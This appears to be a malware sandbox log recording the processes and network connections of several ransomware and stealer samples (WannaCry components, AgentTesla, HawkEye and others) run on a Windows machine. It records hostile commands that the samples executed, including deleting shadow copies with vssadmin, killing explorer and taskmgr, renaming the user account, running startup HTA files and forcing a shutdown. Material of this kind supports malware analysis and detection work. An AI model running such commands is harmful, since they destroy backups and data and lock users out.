"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4424 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5776 /prefetch:2

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6436 /prefetch:8

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6672 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6876 /prefetch:8

C:\Users\Admin\Downloads\@[email protected]

"C:\Users\Admin\Downloads\@[email protected]"

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Users\Admin\Downloads\NoMoreRansom.exe

"C:\Users\Admin\Downloads\NoMoreRansom.exe"

C:\Users\Admin\Downloads\NoMoreRansom.exe

"C:\Users\Admin\Downloads\NoMoreRansom.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7000 /prefetch:8

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\Downloads\CoronaVirus.exe

"C:\Users\Admin\Downloads\CoronaVirus.exe"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\Downloads\taskse.exe

taskse.exe C:\Users\Admin\Downloads\@[email protected]

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Users\Admin\Downloads\taskdl.exe

taskdl.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3952 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7164 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 /prefetch:8

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3400 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2800 /prefetch:8

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\AgentTesla.exe

"C:\Users\Admin\Downloads\AgentTesla.exe"

C:\Users\Admin\Downloads\butterflyondesktop.exe

"C:\Users\Admin\Downloads\butterflyondesktop.exe"

C:\Users\Admin\AppData\Local\Temp\is-A3D3N.tmp\butterflyondesktop.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A3D3N.tmp\butterflyondesktop.tmp" /SL5="$F073C,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe

"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ff9026f46f8,0x7ff9026f4708,0x7ff9026f4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15114729519317706374,5738165897687647915,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Users\Admin\Downloads\HawkEye.exe

"C:\Users\Admin\Downloads\HawkEye.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\sd844ipy.default-release\YOUR_FILES_ARE_ENCRYPTED.HTML"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:19352 CREDAT:17410 /prefetch:2

C:\Users\Admin\Downloads\000.exe

"C:\Users\Admin\Downloads\000.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im explorer.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskmgr.exe

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic useraccount where name='Admin' set FullName='UR NEXT'

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic useraccount where name='Admin' rename 'UR NEXT'

C:\Users\Admin\Downloads\@[email protected]

@[email protected]

C:\Windows\SysWOW64\shutdown.exe

shutdown /f /r /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3911855 /state1:0x41c64e6d

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4560 -ip 4560

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 58764

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 collector.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
GB 20.26.156.210:443 api.github.com tcp
GB 13.87.96.169:443 data-edge.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 data-edge.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 data-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 93.61.165.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 140.82.112.22:443 collector.github.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 camo.githubusercontent.com udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
FR 20.199.58.43:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.140.242.104:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 104.242.140.51.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 172.165.61.93:443 checkappexec.microsoft.com tcp
FR 51.77.7.204:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 172.165.61.93:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
FR 51.178.195.151:443 tcp
FR 51.77.7.204:443 tcp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 149.255.35.125:443 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
